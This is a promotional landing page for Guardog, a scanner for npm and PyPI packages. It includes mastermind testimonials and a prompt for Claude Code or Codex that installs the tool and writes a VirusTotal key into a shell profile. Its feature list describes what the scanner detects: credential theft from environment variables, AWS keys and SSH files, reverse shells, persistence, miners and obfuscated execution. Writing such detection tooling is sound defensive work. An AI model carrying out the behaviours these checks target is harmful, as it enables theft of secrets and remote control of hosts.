Guardog: Package Security Scanner
Scan before you install. Know before it's too late.
Think of it as free antivirus for your code dependencies. It scans every package for hidden malware and checks live vulnerability databases for newly discovered threats. Install once, run it before you install anything.
Install once. Scan anything.
Copy the setup prompt
One prompt handles everything. Copy it from the box below.
Paste into Claude Code or Codex
It installs GuardDog, walks you through getting a free VirusTotal key (500 scans per day, no credit card), and confirms everything is working.
Scan before you install
In Claude Code: /guardog express npm. In terminal: guardog analyze express npm. You get SILENT, WHINE, or BARK.
Free antivirus for your packages. Gets smarter every day.
Scans the files you download
When you run Guardog, it reads the actual package code sitting on your disk. It checks for credential harvesters, obfuscated scripts, crypto miners, reverse shells, and 25+ other malicious patterns. No sample or summary. The real files.
Checks the internet for new threats daily
A package that was clean last month may have a critical CVE discovered today. Guardog queries live vulnerability databases every time you run it, so you are always checking against the latest known threats. Not a snapshot. Live data.
Three verdicts. No ambiguity.
Package passed all checks. Safe to install.
Suspicious signals found. Review before installing.
Dangerous. Do not install.
Want to learn how to do this?
Join the Business Automation Mastermind
A small, focused group of business owners who meet weekly to build real things, fast -- leaving more time to serve clients and be with the people you love.
Real reactions from Business Automation Mastermind members
What members said after their sessions.
Sophia
Session 4
“We have like 55 signups for our masterclass and we've only launched maybe four days ago.”
Jenny
Session 3
“It took like 5 minutes! I just took the one which took me one year, and I said make an essence of that, and what would be the most interesting free webinar?”
Alla
Session 3
“It looks amazing, and everyone loves my website, and they can't believe that I've created it. I can't believe it myself.”
SunDari
Session 1
“I used to pay all these people; now I can do it myself.”
Ronnie
Session 2
“I already had a draft website and it created a link to my calendar, a link to my link tree, a hyperlink for my WhatsApp, all the same photos. This is like 90% of the way there to the kind of website that I want.”
Alla
Session 4
“I've been comparing myself to a bird who now has wings. I feel so free.”
Sophia
Session 4
“I was able to go in and create my full email marketing funnel. It took off so much of the work of creating the workflow.”
Johanna
Session 1
“I have particles floating in the background, a circle following my cursor, things glowing. I could not believe I built this in one session.”
Ronnie
Session 1
“It pulled in my calendar link, my WhatsApp, all my deck photos. This is 90% of the website I wanted. In 45 minutes.”
Aaqib
Session 2
“I got a functional contact form on the website using Resend. I managed to get that set up in like 20 minutes. So I'm pretty stoked.”
Pina Maria
Session 4
“I said change it and it changed my whole website in just one second. Everything worked, it was so easy.”
Johanna
Session 4
“I was so on fire and so motivated because so many pieces of the puzzle I've been working on since a long time are coming together.”
Jasmine
Session 2
“It was great. It's been something that I really want to do, so I'm super grateful. It's so easy and we can just keep building over time. It's epic.”
Aaqib
Session 3
“I did a whole target audience and persona building exercise. I can safely say that I feel addicted to Claude.”
Marina
Session 3
“It's really empowering to learn and to see, with all these different tools, what becomes possible.”
SunDari
Session 4
“Excited that I can just ask Claude anything and be guided and supported through it all.”
Quincee
Session 4
“The website's looking great. I did a brand photoshoot this past week and I feel like a brand new person digitally.”
Alla
Session 2
“I got my website online. Thank you so much, it was amazing.”
Quincee
Session 4
“I feel magnetic. I feel guided.”
Copy. Paste. Done.
One prompt installs GuardDog, gets your free VirusTotal API key, and confirms everything is working. Paste it into Claude Code or Codex.
Set up GuardDog on this computer and get a free VirusTotal API key.
--- STEP 1: Install GuardDog ---
Run these commands in the terminal:
npm install -g github:josephtandle/guardog
guardog setup
After setup:
1. Confirm the guardog command is available globally.
2. Tell me where npm installed the global command.
3. Explain how I use GuardDog before installing unfamiliar packages.
--- STEP 2: Get a free VirusTotal API key ---
VirusTotal scans packages against 70+ antivirus engines. The free tier gives 500 requests per day at 4 requests per minute. No credit card required.
1. Open https://www.virustotal.com in my browser.
2. Create a free account if I do not already have one (click Sign In).
3. Once I confirm I am logged in, go to my profile icon (top-right) and click API Key.
4. Tell me to copy the key shown there.
5. Add the key to my shell profile. On macOS add to ~/.zshrc, on Linux add to ~/.bashrc:
export VIRUSTOTAL_API_KEY="<paste my key here>"
Resolve the home directory dynamically. Do not hard-code any paths.
6. Reload the shell profile so the key is active immediately.
7. Confirm the key loaded: echo $VIRUSTOTAL_API_KEY
--- STEP 3: Confirm everything works ---
Run: guardog analyze lodash npm
Show me the result and explain the verdict (SILENT, WHINE, or BARK).
Remind me to run guardog analyze <package-name> <npm or pypi> before installing any unfamiliar package.Requires Node.js and npm. View on GitHub for the manual install path.
What is VirusTotal and why should you add it?
GuardDog already scans package code, checks live vulnerability databases, and runs 30+ malicious pattern checks on its own. VirusTotal adds a second layer: it submits the package to 70+ antivirus engines simultaneously and checks the result against the world's largest collective threat database. Think of it as GuardDog asking 70 security firms at once.
The prompt handles the full setup: it opens virustotal.com, walks you through creating a free account, copies your API key into your shell profile, and confirms it is working. You can skip this step — GuardDog works without it — but 500 free scans per day is more than most people will ever use.
antivirus engines via VirusTotal (optional)
malicious code patterns detected
command to install
What Guardog checks
Four scanning layers run on every package. VirusTotal is optional but recommended. Everything else works without any setup.
Queries the Open Source Vulnerabilities database maintained by Google. Covers npm, PyPI, and hundreds of other ecosystems. Returns known CVEs with severity ratings.
Each CVE is scored: critical (+25), high (+15), medium (+5), low (+2). The scores stack into a total threat score that drives the final verdict.
OSV is a free, open API. CVE lookups work out of the box on every scan, no account needed.
Checks download counts, package age, maintainer count, and metadata signals. A package with 12 downloads published 3 days ago scores very differently than lodash.
Same reputation signals for Python packages. Age, downloads, maintainer history, and whether the project links to a real repository.
Checks whether the package links to a real GitHub repo. Missing repo, zero stars, and brand-new accounts all add to the threat score.
Detects patterns that read environment variables, AWS keys, SSH files, or browser credential stores and write them to network calls.
Flags eval(), Function(), fromCharCode(), and base64-encoded execution chains. Legitimate packages have no reason to hide what they do.
Detects mining library imports, CPU-pegging loops, and wallet address patterns embedded in install scripts.
Matches patterns that open outbound sockets, spawn shell processes, and establish persistence on the host system.
Scans postinstall, preinstall, and prepare scripts for suspicious network calls and file system writes outside the package directory.
Cross-references the package name against a list of popular packages. A name one character away from "express" or "react" is an immediate flag.
With a free VirusTotal API key, Guardog submits the package URL or file hash for scanning across 70+ AV engines simultaneously. Takes about 5 seconds.
4 requests per minute, 500 per day. More than sufficient for scanning packages before you install them. Sign up takes 2 minutes.
CVE lookups, reputation checks, and pattern analysis all run without a key. VirusTotal adds a deeper malware layer on top. Recommended but not required.
After install, type /guardog followed by any package name in Claude Code. Guardog runs the scan and Claude interprets the results in plain English.
SILENT means safe to install. WHINE means suspicious, review before installing. BARK means dangerous, do not install. No ambiguity.
node ~/guardog/src/index.js analyze lodash npm -- run it directly without Claude Code if you prefer.
P.S. Supply chain attacks through npm and PyPI have hit companies you have heard of. The packages look real. The names are close. The installs are silent. Guardog takes 3 seconds to run and costs nothing.